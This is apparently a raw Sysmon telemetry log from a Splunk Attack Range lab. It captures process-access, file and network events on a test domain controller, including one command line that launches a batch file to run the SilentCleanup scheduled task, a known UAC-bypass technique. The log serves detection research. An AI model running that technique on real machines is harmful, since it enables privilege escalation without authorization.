07:57:19.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.199{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.198{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.166{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.164{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.164{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.162{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.162{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.143{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.142{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.137{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.130{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.128{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.125{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.126{466BC892-F5DF-60EB-797D-00000000CF01}8368C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x80000000000000001051032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E607741E97D2DC0742FB7A4C014B1C9,SHA256=967CC81940BBCC162AAE6134D41580D7F19580007EE337CFE35BF6FAF348CE36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86370BFD607D25151A06E90194694AD1,SHA256=301911791F39B1D6F1B1F81F2142491B4C0AAE51A6F6B5C2AF7BEE1AC9C2DC52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:19.314{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57330-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:20.619{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:20.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AA8E2728C84B0F30DF8041036F6874,SHA256=393C3B8379595F9F380284F6BCC5BF76BD6C8B9DC80759EFD086F869A58D76A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:21.808{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C1BF982666A49C9B036E88555417D34,SHA256=F0AE23E8DC5D5DB90956D46BCF7214957DE3C9FE2F7F4CB2EF159AFC58FEE38F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:20.751{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:21.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 